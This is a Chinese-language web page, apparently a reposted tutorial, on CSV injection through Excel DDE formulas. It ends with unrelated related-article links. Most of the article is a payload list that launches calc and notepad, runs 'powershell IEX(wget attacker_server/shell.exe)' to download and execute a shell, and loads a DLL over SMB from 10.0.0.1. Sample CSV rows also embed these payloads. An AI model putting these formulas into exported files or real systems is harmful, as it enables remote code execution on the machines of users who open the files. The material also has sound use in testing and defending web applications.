简介

许多web应用程序允许用户将发票模板或用户设置等内容下载到CSV文件中。许多用户选择在Excel、Libre Office或open Office中打开CSV文件。当web应用程序无法正确验证CSV文件的内容时,可能会导致执行一个或多个单元格的内容。

漏洞利用

最基本的利用方式是动态数据交换

# pop a calc

DDE ("cmd";"/C calc";"!A0")A0

@SUM(1+1)*cmd|' /C calc'!A0

=2+5+cmd|' /C calc'!A0

# pop a notepad

=cmd|' /C notepad'!'A1'

# powershell download and execute

=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

# msf smb delivery with rundll32

=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

上述有效载荷的技术细节:

cmd 是每当客户端试图访问服务器时,服务器可以响应的名称

/C calc 是执行的文件名,(calc.exe即计算器)

!A0 是项名称,指定当客户端请求数据时服务器可以响应的数据单元

任何公式符号都可以用:

=

+

@

示例:

UserIdBillToDateProjectNameDescriptionDurationMinutes

12017/7/25Test ProjectFlipped the jibbet60

22017/7/25Important Client"Bop, dop, and giglip"240

22017/7/25Important Client"=2+5"240

22017/7/25Important Client"=2+5+cmd|' /C calc'!A0"240

22017/7/25Important Client"=cmd|' /C notepad'!'A1'"240

22017/7/25Important Client"=cmd|'/C powershell IEX(Write-Host "It's run!";)'!A0"240

流量特征如下:

csv注入java怎么解决_CSV Injection(CSV注入)相关推荐

  1. csv文件打开乱码解决

    csv文件打开乱码解决 文章目录 csv文件打开乱码解决 前言 解决方法 前言 公司需要我导出csv的格式进行整理,如下图所示 我导出后用Excel打开却变成了乱码 解决方法 csv格式的文件可以使用 ...

  2. php如何防sql注入,如何在PHP中防止SQL注入

    本篇文章将给大家介绍关于PHP中的SQL注入以及使用PHP-MySQLi和PHP-PDO驱动程序防止SQL注入的方法.下面我们来看具体的内容. 简单的SQL注入示例 例如,A有一个银行网站.已为银行客 ...

  3. java导出csv文件乱码_记一次java生成csv文件乱码的解决过程 (GB2312编码)

    系统:win7 (格式:中文(简体,中国)) 工具:Eclipse (默认编码utf-8) 服务两个:[restful接口]  和 [服务*** server]. 场景:[服务*** server]多 ...

  4. 解决 Error querying database. Cause: java.sql.SQLException: sql injection violation....

    解决 Error querying database. Cause: java.sql.SQLException: sql injection violation- 最近在开发的时候老板的需求就是将模 ...

  5. c++解析csv 存入数组_使用Apache Commons CSV在Java中读写CSV

    介绍 这是专门针对Java读写CSV的库的简短系列文章的第二篇,也是上一篇文章" Core Java读写CSV"的直接续篇. Apache Commons CSV 在Apache的 ...

  6. csv java web 导入_DAY5-step9 使用CSV模块和Pandas在Python中读取和写入CSV文件

    什么是CSV文件? CSV文件是一种纯文本文件,其使用特定的结构来排列表格数据. CSV是一种紧凑,简单且通用的数据交换通用格式. 许多在线服务允许其用户将网站中的表格数据导出到CSV文件中. CSV ...

  7. 15、解决14中csv用excel打开乱码的问题 open('zhihu.csv','w',newline='',encoding='utf-8-sig')...

    解决14中csv用excel打开乱码的问题 ,其实就是在写csv的时候把 utf-8 改成 utf-8-sig open('zhihu.csv','w',newline='',encoding='ut ...

  8. exp4me 用java做的实用的csv导出程序 - 名传无线.freeness.yang

    支持格式:csv 提供的方法: 数据导出请求 传入参数: 1.传入JDAction(数据库交互组件)支持的json格式的查询条件 2.传入需要导出的列 3.传入导出的格式(目前只支持csv) 4.持续 ...

  9. java安全编码指南之:输入注入injection

    文章目录 简介 SQL注入 java中的SQL注入 使用PreparedStatement XML中的SQL注入 XML注入的java代码 简介 注入问题是安全中一个非常常见的问题,今天我们来探讨一下 ...

最新文章

  1. consolez设置
  2. 新手如何使用有三AI系统性跟读AI领域的论文
  3. Codeforces第一次rated比赛
  4. Go语言操作MySQL
  5. 基于Java+SpringMvc+vue+element实现高效学生社团平台管理
  6. 如何理解lvs中DR模型的arp请求-arp_announce和arp_ignore
  7. SAP MM ME51N 创建采购申请单据时候永远取物料主数据基本计量单位
  8. 从程序员到项目经理(七):程序员加油站 -- 完美主义也是一种错
  9. (转) 淘淘商城系列——redis-desktop-manager的使用
  10. java执行cmd命令并获取返回结果字符串
  11. linux卸载文件系统什么意思,Linux文件系统的安装和卸载
  12. 单片机 | Keli 调试程序
  13. unexpectedly exited. Status code was
  14. c语言无符号数最大值和最小值,c语言 int最大值是多少?
  15. 一文通透优化算法:从随机梯度、随机梯度下降法到牛顿法、共轭梯度
  16. 关于程序化交易 这篇文章说透了
  17. 纸张的规格:A3.A4.A5.A6纸的尺寸大小
  18. 005_软件安装之_常用办公软件
  19. matlab如何镜像处理图片,matlab实现图像镜像
  20. Git删除本地多个分支

热门文章

  1. 直播预告 | 小米人工智能部崔世起:小爱同学全双工技术实践
  2. 如何走近深度学习人脸识别?你需要这篇超长综述 | 附开源代码
  3. 【Java代码】实现字符串转数据库的 inStr【使用 JDK8 stream.collect(Collectors.joining(delimiter, prefix, suffix)) 实现】
  4. 【Linux部署】Spring Boot 项目部署在Linux环境下的Docker容器内举例【任务调度系统 xxl-job 任务调度中心】(手动版)
  5. VSCode生成.vue模版
  6. 前端参数无法转为后端实体内部类_Spring Boot返回前端Long型丢失精度
  7. es查询大文本效率_es中terms查询速度能否优化
  8. Web Socket/Stomp——整合Spring Session【Header Token模式】解决方案
  9. Catch Overflow!
  10. Java实现仿百度文库文档在线阅读